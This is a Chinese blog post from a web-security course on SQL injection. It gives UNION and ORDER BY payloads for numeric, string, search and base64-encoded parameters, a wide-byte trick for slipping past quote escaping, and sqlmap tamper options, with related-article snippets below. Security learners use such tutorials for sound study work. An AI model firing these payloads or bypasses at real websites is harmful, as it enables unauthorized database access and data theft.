第27天:WEB攻防-通用漏洞&SQL注入&Tamper脚本&Base64&Json&md5等

最新推荐文章于 2024-04-20 16:55:35 发布
最新推荐文章于 2024-04-20 16:55:35 发布
阅读量476 收藏
点赞数
文章标签: sql 数据库
.
本文链接:https://blog.csdn.net/wuqingsix/article/details/127935500
版权

不同payload类型的注入方式构造

当进行注入时 会发现有 数字型 字符型 搜索型 加密型(base64 json)等,其中构造payload的时候各个方式各不相同:

数字型,就是经常遇到的 ?id=1 这种类型。一般开发人员也不会对数字型进行闭合,可以直接后跟注入语句即可 ?id=1 and 1=2 union select database()--+

 

 字符型

常常就是option=news这种 需要传递的传输为字符串类型,这种接受字符串类型的参数,开发人员往往会对接受过来的字符使用双引号 单引号包裹起来。原sql语句可能是 select new from news where option=""$_GET['optin']" 这个时候传入的payload就要考虑闭合才可以

字符型

select * from inkbamboo where a='g'             假设这条语句为代码中查询的sql语句
simple' order by 16--+                                    该语句是要进行注入的语句
select * from inkbamboo where a='simple' order by 16--+'  语句融合

融合语句解释:'simple'被闭合了,order by 16进行了列数的查询,--+注释了后面的 ' ,这样就形成了注入

搜索型

往往有搜索框的地方也是可能存在注入的,因为很多内容都是存储在数据库中,想要完成搜索,就需要与数据库进行数据交互,如果没有做到安全的过滤或其他的防护手段往往也是会存在SQL注入的。常规的搜索处后台SQL语句是

select value from test where value like "%$_GET['value']%" ,这个时候我们想要对其进行注入,就需要考虑到闭合双引号及通配符的问题了。

select * from inkbamboo where name like '%$s%'     假设这条语句为代码中查询的sql语句
%' UNION+ALL+SELECT+1,database,2,3,4,5 and '%'='    该语句是要进行注入的语句
select * from inkbamboo where name like '%%' UNION+ALL+SELECT+1,database,2,3,4,5 and '%'='%'     语句融合

 加密/编码型

有时候会遇到 id=MQ==这种传输id值时,值为加密的base64或是其他,我们想要对其进行测试时,就需要将我们构造的payload进行base64加密后在进行测试

http://localhost:8080/blog/news.php?a=MQ==        假设这为某页面的url

1 union select 1,database(),3,4,5,7                          注入语句

MSB1bmlvbiBzZWxlY3QgMSxkYXRhYmFzZSgpLDMsNCw1LDc=        base64编码
 

Json格式,

有时候会有 {"id":1}这种格式的参数传递时,我们注入就需要考虑到json的特殊格式。在进行构造payload

原理:下面是一个简单的json格式数据,当把数据取出来时,并不会取出双引号,而且取出来的值默认是以单引号包含的。所以在进行注入时需要考虑单引号闭合。

SQLmap的进阶利用

sqlmap 的tamper利用

当我们测试的注入点是 base64加密,或者是对我们输入的 ' ' "" /等内容进行转义时

只需要我们在使用sqlmap时,加上对应的参数,启用相对的脚本绕过即可

如遇到base64加密的参数值想要对其进行注入时

python sqlmap.py -r 1.txt --tamper=base64encode.py 即可 sqlmap会自动对payload进行加密

宽字节绕过思路:

形成原因:有些判断自动给输入的特殊字符前增加  \ (如遇到对我们输入的 ' ' "" /转义时)

                  绕过它的方法就是 宽字节注入

如payload为 ?id=1 %23' union select database() --+ 这样才可以正常的让单引号发挥作用去闭合原本的sql语句中的单引号

宽字节及其他非普通手法  base64之类的   在sqlmap中  可以使用字典

python sqlmap.py -r 1.txt --tamper=unmagicquotes.py 启用这个脚本即可,就可以让sqlmap智能得在payload中加入宽字节等方法绕过转义函数。

启用对接受到的字符串进行转义的方法可以使用mysql的内置功能 magicquotes 或php的内置函数addslashes()。更多sqlmap的详细用法参考:1. sqlmap超详细笔记+思维导图 - bmjoker - 博客园 (cnblogs.com)icon-default.png?t=M85Bhttps://www.cnblogs.com/bmjoker/p/9326258.html

  

 

My Year 2019
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
第79:Python开发-sqlmapapi&Tamper&Pocsuite1
08-03
1.创建新任务记录任务 ID 2.设置任务 ID 扫描信息 3.开始扫描对应 ID 任务 4.读取扫描状态判断结果 5.如果结束删除 ID 并获取结果 1.熟悉
sqlmap php注入语句,Sqlmap注入Base64编码的注入点
weixin_39544101的博客
03-23 396
不小心删了,找快照才找到的。补回来。。。上次遇到一个Base64的注入点,手工注入太麻烦,于是在网上看了一下sqlmap Base64注入的方法,如下:sqlmap-uhttp://xxxx.com/index.php?tel=LTEnIG9yICc4OCc9Jzg5--tamperbase64encode.py–dbssqlmap拥有很多功能强力的插件,插件的使用方法: -- tamp...
sqlmap使用详解
alohai的博客
06-03 381
最近需要使用sqlmap工具,在此将学习记录记录下来。 一、参数选项 1、选项: -h, --help 显示基本帮助信息并退出 -hh 显示高级帮助信息并退出 --version 显示程序的版本号并退出 -v VERBOSE 详细级别:0-6(默认为 1) 2、目标: 必须至少提供这些选项之一来定义 -u URL, --url=URL 目标 URL(例如“http://www.site.com/vuln.php?id=1”) -d DIRECT 用于直接数据库连接的连接字符串 -l LOGF
SQLMAP简介及使用方式
weixin_61862241的博客
05-06 8415
SQLMAP是一款由Python开发的自动化SQL注入工具,其主要功能是扫描、发现并利用SQL注入漏洞,它内置了很多绕过插件,并且支持多种数据库,如MySQL、Oracle、PostgreSQLSQL Server、Access、IBM DB2、SQLite等数据库;基于布尔类型的注入,即可根据返回页面判断条件真假的注入;基于时间的盲注,即不能根据页面返回判断的时候,利用时间线是否延时来判断条件的真假;
SqlMap工具使用(超详细-网安(白帽黑客)人员必看!!!)
Jinmindong
09-28 280
SqlMap工具使用(超详细-网安(白帽黑客)人员必看!!!)
SQLMAP工具 详细使用方法
HAKUNAMATATATTA的博客
11-15 3198
SQLMAP 是一个开源的渗透测试工具,可以用来自动化的检测,利用 SQL 注入漏洞,获取数据库服务器的权限。它具有功能强大的检测引擎,针对各种不同类型数据库的渗透测试的功能选项,包括获取数据库中存储的数据,访问操作系统文件甚至可以通过外带数据连接的方式执行操作系统命令。
sqlmapbase64加密
向阳-Y.的博客
03-26 865
将以下demo保存为test.php,然后自己搭建一个服务器 <?php $id = base64_encode("id=".$_GET['id']); echo file_get_contents("http://www.xxxx.com/project_detail.php?{$id}"); ?> sqlmap.py -u “http://127.0.0.1/test.php?id=12” -v3 --dbs 就可以跑出来了。 转载自: https://www.cnblogs.com/
sqlmap常用参数和脚本说明
野马菲比的博客
05-26 1142
常用参数: -u 指定目标URL --dbs 列出所有数据库 --current-db 列出当前数据库 --tables 列出当前表 --columns 列出当前列 -D 选择使用哪个数据库 -T 选择使用哪个数据表 -C 选择使用哪个列 --dump 获取字段中的数据 --batch 自动选择yes --smart 启发式快速判断,节约时间 --tamper 调用脚本 -v 指定回显等级 --delay 设置多久可以访问一次,例如--delay 10
[网络安全]sqlmap加密注入教程+实战详析
等风来
08-02 5834
为什么使用sqlmap加密注入 在使用手工注入绕过参数加密的限制时,需要构造出原始POC再进行加密注入,耗时耗力,因此采用sqlmap加密注入。 在开始本文前,sqlmap基础知识及姿势可参考: [网络安全]以留言板项目渗透实例带你入门sqlmap 加密注入语法 基本语法: python sqlmap.py -u 目标URL --注入点="参数=xx"* --dbms 数据库 --threads=线程数 --batch --tamper=加密方式(base64encode等) * 表示只对该参数
sqlmaptamper的用法
热门推荐
路虽远,行将至。事虽难,做必达。
03-09 1万+
sqlmap部分脚本用法说明 1、apostrophemask.py 适用数据库:ALL 作用:将引号替换为utf-8,用于过滤单引号 使用脚本前:tamper("1 AND '1'='1") 使用脚本后:1 AND %EF%BC%871%EF%BC%87=%EF%BC%871 2、base64encode.py 适用数据库:ALL 作用:替换base64编码 使用脚本前:tamper("1' AND SLEEP(5)#") 使用脚本后:MScgQU5EIFNMRUVQKDUpIw==
【实战篇】第20篇:SQL二次编码注入漏洞实例(附tamper脚本)1
08-03
【实战篇】第20篇:SQL二次编码注入漏洞实例(附tamper脚本)1
futwebapp-tampermonkey:用于增强FUT 21 Web App的TamperMonkey脚本-停产
04-28
FUT Web应用程序-TamperMonkey脚本 :warning: 已停产由于个人时间的限制,正如您在过去几个月中都提到的那样,我无法再一直保持此脚本运行。 因此,我决定停止从事此项目,并为社区增加一些清晰度。 该代码将仍然在...
CnC-TA-Opt:C&C脚本
05-08
CnC-TA-Opt 播放“命令与征服:泰伯利亚联盟”时“ CnCTAOpt”链接按钮的脚本。 “链接”按钮将所选基准站的设置发送到“ 。 (不需要Flash)。 CnCTAOpt链接按钮是从克隆而来的,适用于cnctaopt.com。 英语用于读取...
tampermonkey-scripts:我制作或修改的tampermonkey脚本的集合
03-30
篡改脚本我制作或修改的tampermonkey脚本的集合安装转到或打开此中的文件之一,然后单击Raw
Python + SQLAlchemy操作MySQL数据库(ORM)
上庸者-不服周
04-19 304
SQLAlchemy是用Python编程语言开发的一个开源项目。它提供了SQL工具包和ORM(对象关系映射)工具,使用MIT许可证发行。SQLAlchemy采用简单的Python语言,提供高效和高性能的数据库访问,实现了完整的企业级持久模型。它的理念是SQL数据库的量级和性能比对象集合重要,而对象集合的抽象又重要于表和行。
SQL表连接详解:JOIN与逗号(,)的使用及其性能影响
好好学习日记
04-17 1110
在这个详细的解释中,我们将深入探讨SQL中表连接的概念,特别是JOIN和逗号(,)在连接表时的不同用法及其对查询性能的影响。通过实际示例和背后的逻辑分析,我们将揭示在不同场景下选择哪种连接方式更为合适。
mysql和Nosql到底有什么区别,分别应用与什么场景?
最新发布
m0_60388871的博客
04-20 710
MySQL 和 NoSQL 是两种不同类型的数据库技术,它们各有其特点和适用场景。了解它们之间的区别和应用场景可以帮助选择合适的技术来支持特定的应用需求。
PostgreSQL中的索引类型有哪些,以及何时应选择不同类型的索引?
墨松笔记
04-19 824
选择合适的索引类型对于提高PostgreSQL数据库的查询性能至关重要。根据列的数据类型、查询需求和数据分布情况,可以选择合适的索引类型。上述解决方案和示例代码展示了如何在PostgreSQL中创建不同类型的索引,并简要说明了它们的适用场景。在实际应用中,还需要根据具体情况进行调整和优化。相关阅读推荐。
在PostgreSQL中如何处理大对象(Large Objects),例如存储和检索二进制文件?
墨松笔记
04-19 1014
PostgreSQL 提供了对大对象(Large Objects)的支持,这是一种特殊的数据类型,用于存储大量数据,通常用于存储二进制文件或大型文本数据。大对象存储在数据库外部,但在数据库内部进行管理,从而允许您像处理普通数据库对象一样处理它们。您需要提供大对象的 OID、要写入的偏移量(从文件开始的位置)以及要写入的数据。以下是在 PostgreSQL 中处理大对象的基本步骤,包括存储和检索二进制文件的示例代码。这个函数返回一个 OID(对象标识符),您可以将其用作大对象的引用。函数从大对象中读取数据。
https://www.tampermonkey.net/index.php?ext=gz80&show=dhdg
03-16
这是一个Tampermonkey的官方网站,提供了Tampermonkey浏览器扩展的下载和安装,以及用户脚本的搜索和安装。Tampermonkey是一个用户脚本管理器,可以让用户自定义网页的行为和外观,增强网页的功能。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值